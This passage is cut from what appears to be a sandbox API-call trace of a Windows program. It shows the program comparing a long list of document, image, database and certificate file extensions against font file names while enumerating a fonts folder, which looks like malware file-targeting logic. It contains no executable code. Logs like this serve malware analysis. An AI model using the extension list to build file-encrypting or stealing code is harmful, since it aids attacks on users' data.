returned -1 [0284.859] lstrlenW (lpString=".dcm") returned 4 [0284.859] lstrcmpiW (lpString1=".dcm", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".dcr") returned 4 [0284.859] lstrcmpiW (lpString1=".dcr", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".der") returned 4 [0284.859] lstrcmpiW (lpString1=".der", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".dib") returned 4 [0284.859] lstrcmpiW (lpString1=".dib", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".dic") returned 4 [0284.859] lstrcmpiW (lpString1=".dic", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".dif") returned 4 [0284.859] lstrcmpiW (lpString1=".dif", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".divx") returned 5 [0284.859] lstrcmpiW (lpString1=".divx", lpString2="t.ttf") returned -1 [0284.859] lstrlenW (lpString=".djvu") returned 5 [0284.859] lstrcmpiW (lpString1=".djvu", lpString2="t.ttf") returned -1 [0284.859] lstrlenW (lpString=".dng") returned 4 [0284.859] lstrcmpiW (lpString1=".dng", lpString2=".ttf") returned -1 [0284.859] lstrlenW (lpString=".doc") returned 4 [0284.859] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0284.860] lstrlenW (lpString=".docm") returned 5 [0284.860] lstrcmpiW (lpString1=".docm", lpString2="t.ttf") returned -1 [0284.860] lstrlenW (lpString=".docx") returned 5 [0284.860] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0284.860] lstrlenW (lpString=".dot") returned 4 [0284.860] lstrcmpiW (lpString1=".dot", lpString2=".ttf") returned -1 [0284.860] lstrlenW (lpString=".dotm") returned 5 [0284.860] lstrcmpiW (lpString1=".dotm", lpString2="t.ttf") returned -1 [0284.860] lstrlenW (lpString=".dotx") returned 5 [0284.860] lstrcmpiW (lpString1=".dotx", lpString2="t.ttf") returned -1 [0284.860] lstrlenW (lpString=".dpx") returned 4 [0284.860] lstrcmpiW (lpString1=".dpx", lpString2=".ttf") returned -1 [0284.860] lstrlenW (lpString=".dqy") returned 4 [0284.860] lstrcmpiW (lpString1=".dqy", lpString2=".ttf") returned -1 [0284.860] lstrlenW (lpString=".dsn") returned 4 [0284.860] lstrcmpiW (lpString1=".dsn", lpString2=".ttf") returned -1 [0284.860] lstrlenW (lpString=".dt") returned 3 [0284.860] lstrcmpiW (lpString1=".dt", lpString2="ttf") returned -1 [0284.860] lstrlenW (lpString=".dtd") returned 4 [0284.860] lstrcmpiW (lpString1=".dtd", lpString2=".ttf") returned -1 [0284.860] lstrlenW (lpString=".dwg") returned 4 [0284.860] lstrcmpiW (lpString1=".dwg", lpString2=".ttf") returned -1 [0284.860] lstrlenW (lpString=".dwt") returned 4 [0284.860] lstrcmpiW (lpString1=".dwt", lpString2=".ttf") returned -1 [0284.860] lstrlenW (lpString=".dx") returned 3 [0284.860] lstrcmpiW (lpString1=".dx", lpString2="ttf") returned -1 [0284.860] lstrlenW (lpString=".dxf") returned 4 [0284.860] lstrcmpiW (lpString1=".dxf", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".edml") returned 5 [0284.861] lstrcmpiW (lpString1=".edml", lpString2="t.ttf") returned -1 [0284.861] lstrlenW (lpString=".efd") returned 4 [0284.861] lstrcmpiW (lpString1=".efd", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".elf") returned 4 [0284.861] lstrcmpiW (lpString1=".elf", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".emf") returned 4 [0284.861] lstrcmpiW (lpString1=".emf", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".emz") returned 4 [0284.861] lstrcmpiW (lpString1=".emz", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".epf") returned 4 [0284.861] lstrcmpiW (lpString1=".epf", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".eps") returned 4 [0284.861] lstrcmpiW (lpString1=".eps", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".epsf") returned 5 [0284.861] lstrcmpiW (lpString1=".epsf", lpString2="t.ttf") returned -1 [0284.861] lstrlenW (lpString=".epsp") returned 5 [0284.861] lstrcmpiW (lpString1=".epsp", lpString2="t.ttf") returned -1 [0284.861] lstrlenW (lpString=".erf") returned 4 [0284.861] lstrcmpiW (lpString1=".erf", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".exr") returned 4 [0284.861] lstrcmpiW (lpString1=".exr", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".f4v") returned 4 [0284.861] lstrcmpiW (lpString1=".f4v", lpString2=".ttf") returned -1 [0284.861] lstrlenW (lpString=".fido") returned 5 [0284.861] lstrcmpiW (lpString1=".fido", lpString2="t.ttf") returned -1 [0284.861] lstrlenW (lpString=".flm") returned 4 [0284.861] lstrcmpiW (lpString1=".flm", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".flv") returned 4 [0284.862] lstrcmpiW (lpString1=".flv", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".frm") returned 4 [0284.862] lstrcmpiW (lpString1=".frm", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".fxg") returned 4 [0284.862] lstrcmpiW (lpString1=".fxg", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".geo") returned 4 [0284.862] lstrcmpiW (lpString1=".geo", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".gif") returned 4 [0284.862] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".grs") returned 4 [0284.862] lstrcmpiW (lpString1=".grs", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".gz") returned 3 [0284.862] lstrcmpiW (lpString1=".gz", lpString2="ttf") returned -1 [0284.862] lstrlenW (lpString=".h") returned 2 [0284.862] lstrcmpiW (lpString1=".h", lpString2="tf") returned -1 [0284.862] lstrlenW (lpString=".hdr") returned 4 [0284.862] lstrcmpiW (lpString1=".hdr", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".hpp") returned 4 [0284.862] lstrcmpiW (lpString1=".hpp", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".hta") returned 4 [0284.862] lstrcmpiW (lpString1=".hta", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".htc") returned 4 [0284.862] lstrcmpiW (lpString1=".htc", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".htm") returned 4 [0284.862] lstrcmpiW (lpString1=".htm", lpString2=".ttf") returned -1 [0284.862] lstrlenW (lpString=".html") returned 5 [0284.863] lstrcmpiW (lpString1=".html", lpString2="t.ttf") returned -1 [0284.863] lstrlenW (lpString=".icb") returned 4 [0284.863] lstrcmpiW (lpString1=".icb", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".ics") returned 4 [0284.863] lstrcmpiW (lpString1=".ics", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".iff") returned 4 [0284.863] lstrcmpiW (lpString1=".iff", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".inc") returned 4 [0284.863] lstrcmpiW (lpString1=".inc", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".indd") returned 5 [0284.863] lstrcmpiW (lpString1=".indd", lpString2="t.ttf") returned -1 [0284.863] lstrlenW (lpString=".ini") returned 4 [0284.863] lstrcmpiW (lpString1=".ini", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".iqy") returned 4 [0284.863] lstrcmpiW (lpString1=".iqy", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".j2c") returned 4 [0284.863] lstrcmpiW (lpString1=".j2c", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".j2k") returned 4 [0284.863] lstrcmpiW (lpString1=".j2k", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".java") returned 5 [0284.863] lstrcmpiW (lpString1=".java", lpString2="t.ttf") returned -1 [0284.863] lstrlenW (lpString=".jp2") returned 4 [0284.863] lstrcmpiW (lpString1=".jp2", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".jpc") returned 4 [0284.863] lstrcmpiW (lpString1=".jpc", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".jpe") returned 4 [0284.863] lstrcmpiW (lpString1=".jpe", lpString2=".ttf") returned -1 [0284.863] lstrlenW (lpString=".jpeg") returned 5 [0284.864] lstrcmpiW (lpString1=".jpeg", lpString2="t.ttf") returned -1 [0284.864] lstrlenW (lpString=".jpf") returned 4 [0284.864] lstrcmpiW (lpString1=".jpf", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".jpg") returned 4 [0284.864] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".jpx") returned 4 [0284.864] lstrcmpiW (lpString1=".jpx", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".js") returned 3 [0284.864] lstrcmpiW (lpString1=".js", lpString2="ttf") returned -1 [0284.864] lstrlenW (lpString=".jsf") returned 4 [0284.864] lstrcmpiW (lpString1=".jsf", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".json") returned 5 [0284.864] lstrcmpiW (lpString1=".json", lpString2="t.ttf") returned -1 [0284.864] lstrlenW (lpString=".jsp") returned 4 [0284.864] lstrcmpiW (lpString1=".jsp", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".kdc") returned 4 [0284.864] lstrcmpiW (lpString1=".kdc", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".kmz") returned 4 [0284.864] lstrcmpiW (lpString1=".kmz", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".kwm") returned 4 [0284.864] lstrcmpiW (lpString1=".kwm", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".lasso") returned 6 [0284.864] lstrcmpiW (lpString1=".lasso", lpString2="ot.ttf") returned -1 [0284.864] lstrlenW (lpString=".lbi") returned 4 [0284.864] lstrcmpiW (lpString1=".lbi", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".lgf") returned 4 [0284.864] lstrcmpiW (lpString1=".lgf", lpString2=".ttf") returned -1 [0284.864] lstrlenW (lpString=".lgp") returned 4 [0284.865] lstrcmpiW (lpString1=".lgp", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".log") returned 4 [0284.865] lstrcmpiW (lpString1=".log", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".m1v") returned 4 [0284.865] lstrcmpiW (lpString1=".m1v", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".m4a") returned 4 [0284.865] lstrcmpiW (lpString1=".m4a", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".m4v") returned 4 [0284.865] lstrcmpiW (lpString1=".m4v", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".max") returned 4 [0284.865] lstrcmpiW (lpString1=".max", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".md") returned 3 [0284.865] lstrcmpiW (lpString1=".md", lpString2="ttf") returned -1 [0284.865] lstrlenW (lpString=".mda") returned 4 [0284.865] lstrcmpiW (lpString1=".mda", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".mdb") returned 4 [0284.865] lstrcmpiW (lpString1=".mdb", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".mde") returned 4 [0284.865] lstrcmpiW (lpString1=".mde", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".mdf") returned 4 [0284.865] lstrcmpiW (lpString1=".mdf", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".mdw") returned 4 [0284.865] lstrcmpiW (lpString1=".mdw", lpString2=".ttf") returned -1 [0284.865] lstrlenW (lpString=".mef") returned 4 [0284.866] lstrcmpiW (lpString1=".mef", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mft") returned 4 [0284.866] lstrcmpiW (lpString1=".mft", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mfw") returned 4 [0284.866] lstrcmpiW (lpString1=".mfw", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mht") returned 4 [0284.866] lstrcmpiW (lpString1=".mht", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mhtml") returned 6 [0284.866] lstrcmpiW (lpString1=".mhtml", lpString2="ot.ttf") returned -1 [0284.866] lstrlenW (lpString=".mka") returned 4 [0284.866] lstrcmpiW (lpString1=".mka", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mkidx") returned 6 [0284.866] lstrcmpiW (lpString1=".mkidx", lpString2="ot.ttf") returned -1 [0284.866] lstrlenW (lpString=".mkv") returned 4 [0284.866] lstrcmpiW (lpString1=".mkv", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mos") returned 4 [0284.866] lstrcmpiW (lpString1=".mos", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mov") returned 4 [0284.866] lstrcmpiW (lpString1=".mov", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mp3") returned 4 [0284.866] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mp4") returned 4 [0284.866] lstrcmpiW (lpString1=".mp4", lpString2=".ttf") returned -1 [0284.866] lstrlenW (lpString=".mpeg") returned 5 [0284.866] lstrcmpiW (lpString1=".mpeg", lpString2="t.ttf") returned -1 [0284.867] lstrlenW (lpString=".mpg") returned 4 [0284.867] lstrcmpiW (lpString1=".mpg", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".mpv") returned 4 [0284.867] lstrcmpiW (lpString1=".mpv", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".mrw") returned 4 [0284.867] lstrcmpiW (lpString1=".mrw", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".msg") returned 4 [0284.867] lstrcmpiW (lpString1=".msg", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".mxl") returned 4 [0284.867] lstrcmpiW (lpString1=".mxl", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".myd") returned 4 [0284.867] lstrcmpiW (lpString1=".myd", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".myi") returned 4 [0284.867] lstrcmpiW (lpString1=".myi", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".nef") returned 4 [0284.867] lstrcmpiW (lpString1=".nef", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".nrw") returned 4 [0284.867] lstrcmpiW (lpString1=".nrw", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".obj") returned 4 [0284.867] lstrcmpiW (lpString1=".obj", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".odb") returned 4 [0284.867] lstrcmpiW (lpString1=".odb", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".odc") returned 4 [0284.867] lstrcmpiW (lpString1=".odc", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".odm") returned 4 [0284.867] lstrcmpiW (lpString1=".odm", lpString2=".ttf") returned -1 [0284.867] lstrlenW (lpString=".odp") returned 4 [0284.868] lstrcmpiW (lpString1=".odp", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".ods") returned 4 [0284.868] lstrcmpiW (lpString1=".ods", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".oft") returned 4 [0284.868] lstrcmpiW (lpString1=".oft", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".one") returned 4 [0284.868] lstrcmpiW (lpString1=".one", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".onepkg") returned 7 [0284.868] lstrcmpiW (lpString1=".onepkg", lpString2="oot.ttf") returned -1 [0284.868] lstrlenW (lpString=".onetoc2") returned 8 [0284.868] lstrcmpiW (lpString1=".onetoc2", lpString2="boot.ttf") returned -1 [0284.868] lstrlenW (lpString=".opt") returned 4 [0284.868] lstrcmpiW (lpString1=".opt", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".oqy") returned 4 [0284.868] lstrcmpiW (lpString1=".oqy", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".orf") returned 4 [0284.868] lstrcmpiW (lpString1=".orf", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".p12") returned 4 [0284.868] lstrcmpiW (lpString1=".p12", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".p7b") returned 4 [0284.868] lstrcmpiW (lpString1=".p7b", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".p7c") returned 4 [0284.868] lstrcmpiW (lpString1=".p7c", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".pam") returned 4 [0284.868] lstrcmpiW (lpString1=".pam", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".pbm") returned 4 [0284.868] lstrcmpiW (lpString1=".pbm", lpString2=".ttf") returned -1 [0284.868] lstrlenW (lpString=".pct") returned 4 [0284.869] lstrcmpiW (lpString1=".pct", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pcx") returned 4 [0284.869] lstrcmpiW (lpString1=".pcx", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pdd") returned 4 [0284.869] lstrcmpiW (lpString1=".pdd", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pdf") returned 4 [0284.869] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pdp") returned 4 [0284.869] lstrcmpiW (lpString1=".pdp", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pef") returned 4 [0284.869] lstrcmpiW (lpString1=".pef", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pem") returned 4 [0284.869] lstrcmpiW (lpString1=".pem", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pff") returned 4 [0284.869] lstrcmpiW (lpString1=".pff", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pfm") returned 4 [0284.869] lstrcmpiW (lpString1=".pfm", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pfx") returned 4 [0284.869] lstrcmpiW (lpString1=".pfx", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".pgm") returned 4 [0284.869] lstrcmpiW (lpString1=".pgm", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".php") returned 4 [0284.869] lstrcmpiW (lpString1=".php", lpString2=".ttf") returned -1 [0284.869] lstrlenW (lpString=".php3") returned 5 [0284.869] lstrcmpiW (lpString1=".php3", lpString2="t.ttf") returned -1 [0284.869] lstrlenW (lpString=".php4") returned 5 [0284.869] lstrcmpiW (lpString1=".php4", lpString2="t.ttf") returned -1 [0284.870] lstrlenW (lpString=".php5") returned 5 [0284.870] lstrcmpiW (lpString1=".php5", lpString2="t.ttf") returned -1 [0284.870] lstrlenW (lpString=".phtml") returned 6 [0284.870] lstrcmpiW (lpString1=".phtml", lpString2="ot.ttf") returned -1 [0284.870] lstrlenW (lpString=".pict") returned 5 [0284.870] lstrcmpiW (lpString1=".pict", lpString2="t.ttf") returned -1 [0284.870] lstrlenW (lpString=".pl") returned 3 [0284.870] lstrcmpiW (lpString1=".pl", lpString2="ttf") returned -1 [0284.870] lstrlenW (lpString=".pls") returned 4 [0284.870] lstrcmpiW (lpString1=".pls", lpString2=".ttf") returned -1 [0284.870] lstrlenW (lpString=".pm") returned 3 [0284.870] lstrcmpiW (lpString1=".pm", lpString2="ttf") returned -1 [0284.870] lstrlenW (lpString=".png") returned 4 [0284.870] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0284.870] lstrlenW (lpString=".pnm") returned 4 [0284.870] lstrcmpiW (lpString1=".pnm", lpString2=".ttf") returned -1 [0284.870] lstrlenW (lpString=".pot") returned 4 [0284.870] lstrcmpiW (lpString1=".pot", lpString2=".ttf") returned -1 [0284.870] lstrlenW (lpString=".potm") returned 5 [0284.870] lstrcmpiW (lpString1=".potm", lpString2="t.ttf") returned -1 [0284.870] lstrlenW (lpString=".potx") returned 5 [0284.870] lstrcmpiW (lpString1=".potx", lpString2="t.ttf") returned -1 [0284.870] lstrlenW (lpString=".ppa") returned 4 [0284.870] lstrcmpiW (lpString1=".ppa", lpString2=".ttf") returned -1 [0284.870] lstrlenW (lpString=".ppam") returned 5 [0284.870] lstrcmpiW (lpString1=".ppam", lpString2="t.ttf") returned -1 [0284.870] lstrlenW (lpString=".ppm") returned 4 [0284.870] lstrcmpiW (lpString1=".ppm", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".pps") returned 4 [0284.871] lstrcmpiW (lpString1=".pps", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".ppsm") returned 5 [0284.871] lstrcmpiW (lpString1=".ppsm", lpString2="t.ttf") returned -1 [0284.871] lstrlenW (lpString=".ppt") returned 4 [0284.871] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".pptm") returned 5 [0284.871] lstrcmpiW (lpString1=".pptm", lpString2="t.ttf") returned -1 [0284.871] lstrlenW (lpString=".pptx") returned 5 [0284.871] lstrcmpiW (lpString1=".pptx", lpString2="t.ttf") returned -1 [0284.871] lstrlenW (lpString=".prn") returned 4 [0284.871] lstrcmpiW (lpString1=".prn", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".ps") returned 3 [0284.871] lstrcmpiW (lpString1=".ps", lpString2="ttf") returned -1 [0284.871] lstrlenW (lpString=".psb") returned 4 [0284.871] lstrcmpiW (lpString1=".psb", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".psd") returned 4 [0284.871] lstrcmpiW (lpString1=".psd", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".pst") returned 4 [0284.871] lstrcmpiW (lpString1=".pst", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".ptx") returned 4 [0284.871] lstrcmpiW (lpString1=".ptx", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".pub") returned 4 [0284.871] lstrcmpiW (lpString1=".pub", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".pwm") returned 4 [0284.871] lstrcmpiW (lpString1=".pwm", lpString2=".ttf") returned -1 [0284.871] lstrlenW (lpString=".pxr") returned 4 [0284.872] lstrcmpiW (lpString1=".pxr", lpString2=".ttf") returned -1 [0284.872] lstrlenW (lpString=".py") returned 3 [0284.872] lstrcmpiW (lpString1=".py", lpString2="ttf") returned -1 [0284.872] lstrlenW (lpString=".qt") returned 3 [0284.872] lstrcmpiW (lpString1=".qt", lpString2="ttf") returned -1 [0284.872] lstrlenW (lpString=".r3d") returned 4 [0284.872] lstrcmpiW (lpString1=".r3d", lpString2=".ttf") returned -1 [0284.872] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0284.872] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0284.872] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0284.872] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0284.873] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x0, dwReserved1=0x0, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0284.873] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0284.873] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef918492, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2380b, dwReserved0=0x0, dwReserved1=0x0, cFileName="meiryo_boot.ttf", cAlternateFileName="MEIRYO~2.TTF")) returned 1 [0284.873] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4bc156a, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef92a947, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x27a1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjhn_boot.ttf", cAlternateFileName="MSJHN_~1.TTF")) returned 1 [0284.873] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef93ce3b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x281fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="msjh_boot.ttf", cAlternateFileName="MSJH_B~1.TTF")) returned 1 [0284.873] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4be7820, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef94dfcd, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x25b3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="msyhn_boot.ttf", cAlternateFileName="MSYHN_~1.TTF")) returned 1 [0284.874] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, 